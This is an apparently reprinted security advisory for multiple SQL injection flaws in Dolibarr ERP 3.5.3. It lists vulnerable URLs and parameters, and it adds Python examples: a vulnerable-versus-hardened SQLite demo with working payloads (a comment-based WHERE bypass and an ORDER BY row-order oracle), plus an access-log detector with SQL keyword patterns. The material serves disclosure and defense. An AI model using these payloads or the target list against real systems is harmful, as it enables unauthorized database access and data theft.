Dolibarr Multiple SQL Injection Vulnerabilities (CVE-2014-7137)

Published: 2014-11-19
Updated: 2014-11-21

Affected systems:
Dolibarr Dolibarr ERP 3.5.3
Unaffected systems:
Dolibarr Dolibarr ERP 3.6.1
Description:
BUGTRAQ ID: 71189
CVE(CAN) ID: CVE-2014-7137

Dolibarr ERP/CRM is software for managing a company's business information.

Dolibarr 3.5.3 and other versions contain multiple SQL injection vulnerabilities. The injectable inputs are ordinary GET parameters on list and detail pages: free-text search fields (sref, sall, search_*), numeric record identifiers (id, socid, lineid, productid) and the sortfield/sortorder parameters that are placed into the ORDER BY clause. An authenticated attacker who can reach these pages can use them to run unauthorized database queries. Version 3.6.1 is listed as unaffected.
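The following Python/SQLite program is an added illustration of the vulnerability class described above; it is not Dolibarr code (Dolibarr is written in PHP) and the table, its rows and the function names are assumptions made for the example. It shows the two shapes of injection that the test method below exercises: a search value (sref) spliced into a LIKE clause, and identifiers (sortfield, sortorder) spliced into ORDER BY. The second matters because identifiers cannot be bound as query parameters, so the only real fix is an allowlist, which the hardened version applies.

```python
import sqlite3

# Constructed stand-in for a product table. The names mirror the PoC URLs
# (p.rowid, p.ref, tosell) but the schema is assumed, not Dolibarr's own.
PRODUCTS = [
    (1, "PROD-001", "Widget", 1),
    (2, "PROD-002", "Gadget", 0),
    (3, "SECRET-01", "Internal part", 1),
]

# ORDER BY inputs cannot be bound as parameters, so they must be allowlisted.
ALLOWED_SORT_FIELDS = {"p.rowid", "p.ref", "p.label"}
ALLOWED_SORT_ORDERS = {"ASC", "DESC"}


def open_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE product (rowid INTEGER PRIMARY KEY, ref TEXT, label TEXT, tosell INTEGER)"
    )
    conn.executemany("INSERT INTO product VALUES (?, ?, ?, ?)", PRODUCTS)
    return conn


def list_products_vulnerable(conn, sref, sortfield, sortorder):
    """The injectable pattern: both the search value and the ORDER BY
    identifiers are concatenated straight into the SQL text."""
    sql = ("SELECT p.rowid, p.ref FROM product AS p "
           "WHERE p.ref LIKE '%" + sref + "%' "
           "ORDER BY " + sortfield + " " + sortorder)
    return conn.execute(sql).fetchall()


def sort_params_ok(sortfield, sortorder):
    """Allowlist check for the two ORDER BY inputs (exact match, no parsing)."""
    return sortfield in ALLOWED_SORT_FIELDS and sortorder.upper() in ALLOWED_SORT_ORDERS


def list_products_safe(conn, sref, sortfield, sortorder):
    """Hardened form: the value is bound with a placeholder, the identifiers
    are accepted only if they appear verbatim in the allowlist.
    (sref may still contain LIKE wildcards % and _; that affects search
    semantics only, not the SQL structure.)"""
    if not sort_params_ok(sortfield, sortorder):
        raise ValueError("unexpected sortfield/sortorder")
    sql = ("SELECT p.rowid, p.ref FROM product AS p "
           "WHERE p.ref LIKE ? "
           "ORDER BY " + sortfield + " " + sortorder.upper())
    return conn.execute(sql, ("%" + sref + "%",)).fetchall()


def order_by_oracle(pattern):
    """A sortfield payload for the vulnerable function: a yes/no question
    whose answer is readable from the row order (ascending rowid if the
    subquery finds a match, descending otherwise). Built for this example."""
    return ("(CASE WHEN (SELECT count(*) FROM product WHERE ref LIKE '" + pattern + "') > 0 "
            "THEN p.rowid ELSE -p.rowid END)")


if __name__ == "__main__":
    db = open_db()
    # Search bypassed: the comment marker swallows the rest of the WHERE and ORDER BY.
    print(list_products_vulnerable(db, "' OR 1=1 --", "p.ref", "ASC"))
    # Row order leaks whether a ref starting with SECRET exists: 1,2,3 vs 3,2,1.
    print(list_products_vulnerable(db, "", order_by_oracle("SECRET%"), "ASC"))
    print(list_products_vulnerable(db, "", order_by_oracle("NOPE%"), "ASC"))
    # Hardened: the same sref is just a literal that matches nothing.
    print(list_products_safe(db, "' OR 1=1 --", "p.ref", "ASC"))
```

The ORDER BY case is the one to remember when triaging sortfield/sortorder findings: no quote is needed, a single query is enough, and the response body itself (row order) is the side channel, so a "no stacked queries" database driver does not mitigate it.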

<*Source: Jerzy Kramarz

  Link:
 *>

Test method:

WARNING

The following programs (methods) may be offensive in nature and are provided for security research and teaching only. Use at your own risk!
[IP]/dolibarr/product/stock/fiche.php?action=edit&id=1<SQL Injection>

[IP]/dolibarr/product/stock/liste.php?sref=55<SQL Injection>&token=142abe4c1c4b84c3d0c81533c3840cc4&sall=55

[IP]/dolibarr/product/stock/liste.php?sref=555-555-0199 (at) example (dot) c [email concealed] om&token=142abe4c1c4b84c3d0c81533c3840cc4&sall=55<SQL Injection>

[IP]/dolibarr/projet/element.php?ref=PJ1407<SQL Injection>

[IP]/dolibarr/projet/tasks/index.php?search_project=5<SQL Injection>bqve&button_search.x=1&button_search.y=1&mode=

[IP]/dolibarr/compta/prelevement/demandes.php?search_societe=5<SQL Injection>&search_facture=5&button_search.x=1&button_search.y=1

[IP]/dolibarr/comm/mailing/liste.php?sref=5<SQL Injection>&sall=5&x=1&y=1

[IP]/dolibarr/comm/mailing/liste.php?sref=5&sall=5<SQL Injection>&x=1&y=1

[IP]/dolibarr/compta/sociales/index.php?search_label=5<SQL Injection>&button_search.x=1&button_search.y=1

[IP]/dolibarr/compta/paiement/cheque/liste.php?sortfield=bc.number<SQL Injection>&sortorder=asc&begin=&

[IP]/dolibarr/compta/paiement/cheque/liste.php?sortfield=bc.number&sortorder=asc<SQL Injection>&begin=&

[IP]/dolibarr/compta/prelevement/rejets.php?sortfield=p.ref<SQL Injection>&sortorder=asc&begin=&

[IP]/dolibarr/compta/prelevement/rejets.php?sortfield=p.ref&sortorder=asc<SQL Injection>&begin=&

[IP]/dolibarr/product/liste.php?sortfield=p.ref&sortorder=asc&begin=&sref=&snom=&sall=&tosell=<SQL Injection>&tobuy=&type=&

[IP]/dolibarr/product/liste.php?sortfield=p.ref&sortorder=asc&begin=&sref=&snom=&sall=&tosell=&tobuy=<SQL Injection>&type=&

[IP]/dolibarr/product/reassort.php?toolowstock=on&snom=5&sortorder=ASC&sref=5&token=d638ca7f80a7ad68e2cf327a75f954a6&button_search.x=1&button_search.y=1&type=&search_categ=4<SQL Injection>&sortfield=stock_physique

[IP]/dolibarr/product/liste.php?sortfield=p.ref&sortorder=asc&begin=&sref=&snom=&sall=&tosell=1<SQL Injection>&tobuy=&type=&

[IP]/dolibarr/product/liste.php?sortfield=p.ref&sortorder=asc&begin=&sref=&snom=&sall=&tosell=1&tobuy=<SQL Injection>&type=&

[IP]/dolibarr/product/stats/commande_fournisseur.php?sortfield=c.rowid<SQL Injection>&sortorder=asc&begin=&id=2

[IP]/dolibarr/product/stats/commande_fournisseur.php?sortfield=c.rowid&sortorder=asc<SQL Injection>&begin=&id=2

[IP]/dolibarr/product/stats/contrat.php?sortfield=c.rowid<SQL Injection>&sortorder=asc&begin=&id=2

[IP]/dolibarr/product/stats/contrat.php?sortfield=c.rowid'&sortorder=asc<SQL Injection>&begin=&id=2

[IP]/dolibarr/product/stats/facture_fournisseur.php?sortfield=s.rowid<SQL Injection>&sortorder=asc&begin=&id=2

[IP]/dolibarr/product/stats/facture_fournisseur.php?sortfield=s.rowid&sortorder=asc<SQL Injection>&begin=&id=2

[IP]/dolibarr/product/stats/propal.php?sortfield=p.rowid<SQL Injection>&sortorder=asc&begin=&id=2

[IP]/dolibarr/product/stats/propal.php?sortfield=p.rowid&sortorder=asc<SQL Injection>&begin=&id=2

[IP]/dolibarr/product/stock/fiche.php?id=0<SQL Injection>

[IP]/dolibarr/product/stock/info.php?id=0<SQL Injection>

[IP]/dolibarr/product/stock/liste.php?sortfield=e.label&sortorder=asc<SQL Injection>&begin=&

[IP]/dolibarr/product/stock/liste.php?sortfield=e.label<SQL Injection>&sortorder=asc&begin=&

[IP]/dolibarr/product/reassort.php?toolowstock=on&snom=5&sortorder=ASC&sref=5<SQL Injection>&token=d638ca7f80a7ad68e2cf327a75f954a6&button_search.x=1&button_search.y=1&type=&search_categ=4&sortfield=stock_physique

[IP]/dolibarr/product/stock/massstockmove.php?productid=1<SQL Injection>&token=9d491e55462571d39390bd136f4f50da&id_tw=-1&action=addline&qty=5&id_sw=-1&addline=%D8%B1%D8%AA%D8%AE%D8%A7&search_productid=5

[IP]/dolibarr/product/stock/replenishorders.php?sortfield=cf.ref&sortorder=asc<SQL Injection>&begin=&

[IP]/dolibarr/product/stock/replenishorders.php?sortfield=cf.ref<SQL Injection>&sortorder=asc&begin=&

[IP]/dolibarr/projet/contact.php?id=1&action=deletecontact&lineid=21<SQL Injection>

[IP]/dolibarr/projet/contact.php?id=1&action=swapstatut&ligne=21<SQL Injection>

[IP]/dolibarr/projet/tasks/contact.php?id=1&action=swapstatut&ligne=21<SQL Injection>

[IP]/dolibarr/compta/recap-compta.php?socid=1<SQL Injection>

[IP]/dolibarr/holiday/index.php?mainmenu=holiday&id=1<SQL Injection>
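For defenders who cannot upgrade immediately, the list above doubles as a detection spec: every injection point is a GET parameter with a narrow legitimate shape (sortfield is a column list, sortorder is asc/desc, ids are digits, search fields are free text that should never contain quotes or comment markers). The following Python script is an added example, not part of the advisory or of Dolibarr, that applies those shape checks to web-server access-log lines. The watched path set is a subset of the pages listed above, the parameter classes are inferred from the URLs, and the five log lines are constructed for the example.

```python
import re
import urllib.parse

# Pages from the advisory's test method (relative to the Dolibarr root).
# Subset for the example; extend with the remaining paths from the list.
WATCHED_PATHS = {
    "/dolibarr/product/liste.php",
    "/dolibarr/product/stock/liste.php",
    "/dolibarr/product/stock/fiche.php",
    "/dolibarr/compta/paiement/cheque/liste.php",
    "/dolibarr/projet/element.php",
    "/dolibarr/holiday/index.php",
}

# Parameter classes inferred from the PoC URLs and what each should look like.
NUMERIC_PARAMS = {"id", "socid", "lineid", "ligne", "productid", "tosell", "tobuy", "search_categ"}
SEARCH_PARAMS = {"sref", "sall", "snom", "ref"}          # plus anything starting with search_
SORTFIELD_RE = re.compile(r"^[A-Za-z0-9_.]+(,[A-Za-z0-9_.]+)*$")   # e.g. p.ref or p.ref,p.rowid
SORTORDER_RE = re.compile(r"^(asc|desc)(,(asc|desc))*$", re.IGNORECASE)
NUMERIC_RE = re.compile(r"^-?\d*$")      # blank allowed: Dolibarr forms submit empty fields
# Free-text search fields: flag string terminators, comment markers and common probe keywords.
SQL_META_RE = re.compile(r"['\"\\;]|--|/\*|\b(union|select|sleep|benchmark)\b", re.IGNORECASE)

# Apache/nginx combined log format; only the fields used here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample: one benign product list request, three probes, one
# benign detail view and one request to an unwatched page.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Nov/2014:10:01:02 +0000] "GET /dolibarr/product/liste.php?sortfield=p.ref&sortorder=asc&sref=&snom=&sall=&tosell=1&tobuy=&type= HTTP/1.1" 200 5123',
    '203.0.113.7 - - [19/Nov/2014:10:01:09 +0000] "GET /dolibarr/product/liste.php?sortfield=p.ref&sortorder=asc%27&begin=&sref=&snom=&sall=&tosell=&tobuy=&type= HTTP/1.1" 200 5123',
    '203.0.113.7 - - [19/Nov/2014:10:01:15 +0000] "GET /dolibarr/product/stock/fiche.php?id=1%27 HTTP/1.1" 500 312',
    '203.0.113.7 - - [19/Nov/2014:10:01:21 +0000] "GET /dolibarr/product/stock/liste.php?sref=55%27--&token=142abe4c1c4b84c3d0c81533c3840cc4&sall=55 HTTP/1.1" 200 4870',
    '198.51.100.4 - - [19/Nov/2014:10:02:00 +0000] "GET /dolibarr/projet/element.php?ref=PJ1407 HTTP/1.1" 200 2210',
    '198.51.100.4 - - [19/Nov/2014:10:02:30 +0000] "GET /dolibarr/index.php?mainmenu=home HTTP/1.1" 200 900',
]


def classify(param, value):
    """Return a reason string if the (already URL-decoded) value does not fit
    the expected shape of this parameter, otherwise None."""
    if param == "sortfield":
        return None if SORTFIELD_RE.match(value) else "sortfield is not a column list"
    if param == "sortorder":
        return None if SORTORDER_RE.match(value) else "sortorder is not asc/desc"
    if param in NUMERIC_PARAMS:
        return None if NUMERIC_RE.match(value) else "numeric id contains non-digits"
    if param in SEARCH_PARAMS or param.startswith("search_"):
        return "SQL metacharacter in search field" if SQL_META_RE.search(value) else None
    return None   # token, begin, type, button_search.x etc. are not injection points here


def scan_log(lines):
    """Yield (ip, path, param, decoded value, reason) for each suspicious
    parameter on a watched Dolibarr page."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urllib.parse.urlsplit(m.group("target"))
        if url.path not in WATCHED_PATHS:
            continue
        # parse_qsl percent-decodes once, which is what the server would do.
        for param, value in urllib.parse.parse_qsl(url.query, keep_blank_values=True):
            reason = classify(param, value)
            if reason:
                hits.append((m.group("ip"), url.path, param, value, reason))
    return hits


if __name__ == "__main__":
    for ip, path, param, value, reason in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} {param}={value!r}: {reason}")
```

The checks are deliberately shape-based rather than signature-based: a sortorder that is anything but asc/desc is anomalous regardless of the payload, which catches the quote-free ORDER BY probes that keyword lists miss. Limits to keep in mind: only one level of percent-decoding is applied, POST bodies are not in access logs, and the sortfield pattern assumes the column-list convention seen in the PoC URLs, so tune it against your own traffic before alerting on it.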

Content copyright notice: unless otherwise stated, all articles are original to this site.

When reprinting, credit the source: http://www.heiqu.com/899ac50714c110d78f1fc88c3dbf98cc.html